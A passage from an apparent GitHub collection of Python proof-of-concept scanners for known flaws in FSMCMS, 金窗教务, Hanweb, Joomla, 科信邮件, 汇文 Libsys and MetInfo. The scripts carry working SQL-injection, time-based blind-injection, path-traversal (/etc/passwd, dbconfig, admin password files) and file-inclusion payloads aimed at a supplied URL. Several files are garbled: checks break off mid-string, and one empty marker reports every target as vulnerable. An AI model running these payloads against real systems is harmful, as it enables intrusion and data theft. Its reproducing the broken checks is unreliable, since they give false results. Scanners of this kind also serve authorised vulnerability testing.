7 | description: 东方文辉网站群内容管理系统FSMCMS网站重装漏洞,网站安装程序在安装之后默认没有删除,也没有限制,可以很容易的恶意把网站重装了。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
class fsmcms_setup_reinstall_BaseVerify:
    """Checks whether the FSMCMS installer page (/setup/index.jsp) is still reachable.

    NOTE(review): part of run() is missing from this listing — everything between
    the opening ``if r'`` and the final except handler was dropped, most likely an
    angle-bracketed marker and the lines after it — so the verdict logic cannot be
    reviewed here.
    """
    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Fetch the installer page and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/setup/index.jsp"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # Garbled in this listing: the marker string and the following lines are missing.
            if r'可能不存在漏洞", "cyan")
34 |
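if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = fsmcms_setup_reinstall_BaseVerify(sys.argv[1])
    testVuln.run()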
39 |
--------------------------------------------------------------------------------
/pocs/gowinsoft_jw/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/gowinsoft_jw/__init__.py
--------------------------------------------------------------------------------
/pocs/gowinsoft_jw/gowinsoft_jw_multi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金窗教务系统存在多处SQL注射漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0101234
6 | author: Lucifer
7 | description: 金窗教务系统多处SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
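class gowinsoft_jw_multi_sqli_BaseVerify:
    """Error-based SQL injection check across several 金窗教务系统 ASP endpoints.

    One injection suffix is appended to each endpoint in turn; any response that
    echoes the conversion-error marker is reported, and a single negative line
    is printed only when no endpoint matched.
    """

    def __init__(self, url):
        # Target base URL; each endpoint path and the payload are appended to it unchanged.
        self.url = url

    def run(self):
        """Probe every endpoint and print a coloured verdict per hit; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # ChAr(71)...ChAr(64) spells "GAO JI@"; CoNvErT(InT, ...) on that text forces a
        # conversion error whose message echoes the marker followed by @@VERSION.
        payload = "%27AnD%201=CoNvErT(InT,(ChAr(71)%2BChAr(65)%2BChAr(79)%2BChAr(32)%2BChAr(74)%2BChAr(73)%2BChAr(64)%2B@@VeRsIon%20))%20AnD%20%27a%27=%27a"
        urls = ["/jiaoshi/shizi/shizi/textbox.asp?id=1",
                "/jiaoshi/sj/shixi/biyeshan1.asp?id=1",
                "/jiaoshi/sj/shiyan/xuankeda.asp?bianhao=1",
                "/jiaoshi/xueji/dangan/sdangangai1.asp?id=1",
                "/jiaoshi/xueji/shen/autobh.asp?jh=1"]
        # (The former `vulnurl = self.url + payload` before the loop was dead code and is gone;
        # the probe URL is built per endpoint below.)
        noexist = True
        try:
            for turl in urls:
                vulnurl = self.url + turl + payload
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"GAO JI@Microsoft" in req.text:
                    cprint("[+]存在金窗教务系统存在多处SQL注射漏洞...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在gowinsoft_jw_multi_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        # Note that one failing endpoint still aborts the remaining ones, as before.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")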
41 |
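if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = gowinsoft_jw_multi_sqli_BaseVerify(sys.argv[1])
    testVuln.run()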
--------------------------------------------------------------------------------
/pocs/hanweb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/hanweb/__init__.py
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_VerifyCodeServlet_install.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉VerfiyCodeServlet越权漏洞
5 | referer: http://www.2cto.com/Article/201507/418593.html
6 | author: Lucifer
7 | description: /VerifyCodeServlet 可以 创建任意 SESSION的key值,opr_licenceinfo.jsp需要一个SESSION cookie_username 不为空,就可以成功登录。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
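class hanweb_VerifyCodeServlet_install_BaseVerify:
    """Session-key abuse check for Hanweb (大汉) VerifyCodeServlet.

    For each candidate application prefix the servlet is called with
    ``var=cookie_username``; if it answers 200 the same session is then used to
    fetch the setup pages, and a 200 whose body contains a marker is reported.
    Exactly one negative line is printed when nothing matched.
    """

    def __init__(self, url):
        # Target base URL; application prefixes and page paths are appended to it unchanged.
        self.url = url

    def run(self):
        """Probe every prefix / setup-page combination and print coloured verdicts; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        paths=['/vipchat/','/jcms/','/jsearch/','/jact/','/vc/','/xxgk/']
        payload = 'VerifyCodeServlet?var=cookie_username'
        adminpaths=['setup/opr_licenceinfo.jsp','setup/admin.jsp']
        # One Session so cookies set by the servlet call are replayed to the setup pages.
        sess = requests.Session()
        found = False
        try:
            for path in paths:
                vulnurl=self.url+path+payload
                req = sess.get(vulnurl, headers=headers, timeout=10, verify=False)
                if req.status_code != 200:
                    continue
                for adminpath in adminpaths:
                    adminurl=self.url+path+adminpath
                    req2 = sess.get(adminurl, headers=headers, timeout=10, verify=False)
                    # NOTE(review): 'admin' alone is a weak marker — a login form served at
                    # setup/admin.jsp would contain it too; a marker specific to the
                    # authenticated page would cut false positives.
                    if req2.status_code == 200 and ('Licence' in req2.text or 'admin' in req2.text):
                        cprint("[+]存在大汉VerfiyCodeServlet越权漏洞...(高危)\tpayload: "+"1.先访问"+vulnurl+"\t2.再访问"+adminurl, "red")
                        found = True
            # A single summary replaces the old per-prefix negative message, which was
            # printed once for every non-200 prefix and never when every prefix answered
            # 200 but no setup page matched.
            if not found:
                cprint("[-]不存在hanweb_VerifyCodeServlet_install漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")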
42 |
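if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = hanweb_VerifyCodeServlet_install_BaseVerify(sys.argv[1])
    testVuln.run()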
47 |
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_downfile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉downfile.jsp 任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-092339
6 | author: Lucifer
7 | description: 文件/vc/vc/columncount/downfile.jsp中,参数filename存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
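class hanweb_downfile_filedownload_BaseVerify:
    """Path-traversal file download check for Hanweb (大汉) downfile.jsp (``filename``).

    The probe requests ``/etc/passwd`` through the traversal and looks for
    typical passwd content in the response.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Both markers are required; a passwd file whose shells are all /bin/sh
            # (no bash entry) would be missed by this check.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在大汉downfile.jsp 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在hanweb_downfile_filedownload漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")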
33 |
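if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = hanweb_downfile_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()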
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_readxml_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉版通JCMS数据库配置文件读取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-046837
6 | author: Lucifer
7 | description: 大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤,导致可以直接直接读取数据库配置文件,
8 | 由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件。
9 |
10 | '''
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
class hanweb_readxml_fileread_BaseVerify():
    """Config-file read check for Hanweb JCMS readxml.jsp (``flowcode`` traversal).

    The probe asks for WEB-INF/config/dbconfig through readxml.jsp; the verdict
    depends on a marker in the response body (see the note in run()).
    """
    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # NOTE(review): an empty-string marker is contained in every response, so this
            # branch always fires and the check reports every target as vulnerable. The
            # listing most likely lost an angle-bracketed marker (an XML element from the
            # dbconfig file) here; restore the intended marker before relying on this PoC.
            if r"" in req.text:
                cprint("[+]存在大汉版通JCMS数据库读取漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在hanweb_readxml_fileread漏洞", "white", "on_grey")

        # Bare except also swallows KeyboardInterrupt/SystemExit; `except Exception` would be safer.
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
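if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = hanweb_readxml_fileread_BaseVerify(sys.argv[1])
    testVuln.run()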
--------------------------------------------------------------------------------
/pocs/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/joomla/__init__.py
--------------------------------------------------------------------------------
/pocs/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla组件com_docman本地文件包含
5 | referer: https://www.exploit-db.com/exploits/37620
6 | author: Lucifer
7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class joomla_com_docman_lfi_BaseVerify:
    """Local file inclusion check for the Joomla com_docman component (dl2.php ``file``).

    NOTE(review): part of run() is missing from this listing — everything between
    ``req.status_code == 200 and r"`` and the final except handler was dropped,
    most likely an angle-bracketed marker and the lines after it — so the verdict
    logic cannot be reviewed here.
    """
    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # The base64 ``file`` value is what the docstring describes as decoded server-side.
        payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Garbled in this listing: the marker string and the following lines are missing.
            if req.status_code == 200 and r"可能不存在漏洞", "cyan")
33 |
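if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
    testVuln.run()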
--------------------------------------------------------------------------------
/pocs/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla 3.7.0 core SQL注入
5 | referer: https://www.08sec.com/bobao/15167.html
6 | author: Lucifer
7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入.
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
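class joomla_index_list_sqli_BaseVerify:
    """Error-based SQL injection check for Joomla 3.7.0 com_fields (``list[fullordering]``).

    The probe makes ``updatexml`` raise an error containing ``Md5(1234)`` and
    looks for that digest in the response body.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Full 32-hex md5("1234"), consistent with the sibling PoCs; the previous
            # 31-character prefix matched the same responses but was an evident truncation.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")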
33 |
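if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
    testVuln.run()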
--------------------------------------------------------------------------------
/pocs/kxmail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/kxmail/__init__.py
--------------------------------------------------------------------------------
/pocs/kxmail/kxmail_login_server_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 科信邮件系统login.server.php 时间盲注
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0122071
6 | author: Lucifer
7 | description: 文件prog/login.server.php中,参数xjxargs存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
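class kxmail_login_server_sqli_BaseVerify:
    """Time-based blind SQL injection check for 科信邮件系统 prog/login.server.php (``xjxargs``).

    A POST carrying a ``SLEEP(6)`` sub-query is sent; a round trip of at least
    6 seconds is reported as a positive result.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/prog/login.server.php"
        vulnurl = self.url + payload
        # NOTE(review): the xjxargs[] value is reproduced as listed; the "..." runs suggest
        # this listing may have lost angle-bracketed xajax markup — verify against the
        # upstream file before trusting the payload.
        post_data = {
            "xjxfun":"Function_PostLogin",
            "xjxr":"1434907361662",
            "xjxargs[]":"lo_osSWindows_NTlo_processorSlo_computernameSRD-HL-EMAILlo_user_agentSlo_ipS...lo_languageSuserSadmin139' AND(SELECT * FROM (SELECT(SLEEP(6)))taSu) AND 'dwkL'='dwkLdomainS...passwdSadminco_language_selectSco_sy_idS10random_picS5139random_numS240955"
        }
        start_time = time.time()
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # A wall-clock round trip of 6 s or more is taken as SLEEP(6) firing; a slow
            # server yields the same signal, so a positive needs confirmation.
            if time.time() - start_time >= 6:
                cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在kxmail_login_server_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate;
        # timeouts (>10 s) land here as "probably not vulnerable".
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")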
41 |
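if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = kxmail_login_server_sqli_BaseVerify(sys.argv[1])
    testVuln.run()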
--------------------------------------------------------------------------------
/pocs/libsys/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/libsys/__init__.py
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_asyn_link_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-067400
6 | author: Lucifer
7 | description: 漏洞影响3.5,4.0,5.0版本,漏洞文件位于ajax_asyn_link.php中,参数url可以传入"../"来读取PHP文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class libsys_ajax_asyn_link_fileread_BaseVerify:
    """Arbitrary file read check for 汇文 ajax_asyn_link.php (``url`` traversal), three path variants.

    NOTE(review): part of run() is missing from this listing — everything between
    ``if r"`` and the final except handler was dropped, most likely an
    angle-bracketed marker and the lines after it — so the verdict logic and the
    use of ``noexist`` cannot be reviewed here.
    """
    def __init__(self, url):
        # Target base URL; each probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Probe each path variant and print coloured verdicts; returns nothing."""
        try:
            noexist = True
            for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
                            r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
                            r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
                vulnurl = self.url + payload

                # No User-Agent header is set here, unlike the other PoCs in this tree.
                req = requests.get(vulnurl, timeout=10, verify=False)
                # Garbled in this listing: the marker string and the following lines are missing.
                if r"可能不存在漏洞", "cyan")
34 |
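if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = libsys_ajax_asyn_link_fileread_BaseVerify(sys.argv[1])
    testVuln.run()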
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_asyn_link_old_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-059850
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_asyn_link.old.php中,参数url可以传入"../"来读取配置文件,并成功登陆到后台。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class libsys_ajax_asyn_link_old_fileread_BaseVerify:
    """Arbitrary file read check for 汇文 ajax_asyn_link.old.php (``url`` traversal).

    NOTE(review): part of run() is missing from this listing — everything between
    ``if r"`` and the final except handler was dropped, most likely an
    angle-bracketed marker and the lines after it — so the verdict logic cannot
    be reviewed here.
    """
    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        payload = "/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php"
        vulnurl = self.url + payload
        try:
            # No User-Agent header is set here, unlike the other PoCs in this tree.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Garbled in this listing: the marker string and the following lines are missing.
            if r"可能不存在漏洞", "cyan")
31 |
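if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = libsys_ajax_asyn_link_old_fileread_BaseVerify(sys.argv[1])
    testVuln.run()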
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_get_file_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_get_file.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0116255
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_get_file.php中,参数filename可以传入"../"来读取配置文件,并成功登陆到后台。'''
8 | import sys
9 | import requests
10 | import warnings
11 | from termcolor import cprint
12 |
class libsys_ajax_get_file_fileread_BaseVerify:
    """Arbitrary file read check for 汇文 ajax_get_file.php (``filename`` traversal).

    NOTE(review): part of run() is missing from this listing — everything between
    ``if r"`` and the final except handler was dropped, most likely an
    angle-bracketed marker and the lines after it — so the verdict logic cannot
    be reviewed here.
    """
    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        payload = "/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php"
        vulnurl = self.url + payload
        try:
            # No User-Agent header is set here, unlike the other PoCs in this tree.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Garbled in this listing: the marker string and the following lines are missing.
            if r"可能不存在漏洞", "cyan")
30 |
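if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = libsys_ajax_get_file_fileread_BaseVerify(sys.argv[1])
    testVuln.run()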
--------------------------------------------------------------------------------
/pocs/metinfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/metinfo/__init__.py
--------------------------------------------------------------------------------
/pocs/metinfo/metinfo_getpassword_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: metinfo5.0 getpassword.php两处时间盲注漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-021062
6 | author: Lucifer
7 | description: member/getpassword.php与admin/admin/getpassword.php文件中,经过base64解码后的值用explode打散后进入到
8 | SQL语句引起注入。
9 | '''
10 | import sys
11 | import time
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
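class metinfo_getpassword_sqli_BaseVerify:
    """Time-based blind SQL injection check for MetInfo 5.0 getpassword.php (member and admin copies).

    Each probe carries a base64 ``p`` value that, per the module description and
    the 6-second threshold below, decodes to a sleep(6) injection. Every probe
    is timed and reported on its own.
    """

    def __init__(self, url):
        # Target base URL; each probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send both probes and print a coloured verdict for each; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payloads = [r"/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNikpIy4x",
                    r"/admin/admin/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNikpIy4x"]

        for payload in payloads:
            vulnurl = self.url + payload
            start_time = time.time()

            # try/except stays inside the loop on purpose: a timeout on one copy of the
            # script must not prevent the other copy from being probed.
            try:
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                # A wall-clock round trip of 6 s or more is taken as the injected sleep
                # firing; a slow server yields the same signal.
                if time.time() - start_time >= 6:
                    cprint("[+]存在metinfo SQL盲注漏洞...(高危)\tpayload: "+vulnurl, "red")
                else:
                    cprint("[-]不存在metinfo_getpassword_sqli漏洞", "white", "on_grey")
            # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
            except Exception:
                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")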
40 |
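if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = metinfo_getpassword_sqli_BaseVerify(sys.argv[1])
    testVuln.run()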
--------------------------------------------------------------------------------
/pocs/metinfo/metinfo_login_check_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: metinfo v5.3sql注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0100846
6 | author: Lucifer
7 | description: metinfo /admin/login/login_check.php?langset=cn 的langset 参数没有过滤存在sql注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
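class metinfo_login_check_sqli_BaseVerify:
    """Boolean-based SQL injection check for MetInfo v5.3 admin/login/login_check.php (``langset``).

    Two requests are compared: one with an always-true and one with an
    always-false injected condition. The target is reported when only the false
    variant produces the "not have this language" error.
    """

    def __init__(self, url):
        # Target base URL; the probe paths are appended to it unchanged.
        self.url = url

    def run(self):
        """Send both probes and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }

        true_url = self.url + r"/admin/login/login_check.php?langset=cn%27AnD%271%27=%271"
        false_url = self.url + r"/admin/login/login_check.php?langset=cn%27AnD%271%27=%272"
        # Previously `noexist` was read without ever being assigned, so the negative verdict
        # raised NameError and was reported as "可能不存在漏洞" by the except handler.
        noexist = True
        try:
            req1 = requests.get(true_url, headers=headers, timeout=10, verify=False)
            req2 = requests.get(false_url, headers=headers, timeout=10, verify=False)
            # Differential: the error must appear for the false condition only.
            if r"not have this language" in req2.text and r"not have this language" not in req1.text:
                cprint("[+]存在metinfo v5.3 SQL注入漏洞...(高危)\tpayload: "+false_url, "red")
                noexist = False
            if noexist:
                cprint("[-]不存在metinfo_login_check_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")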
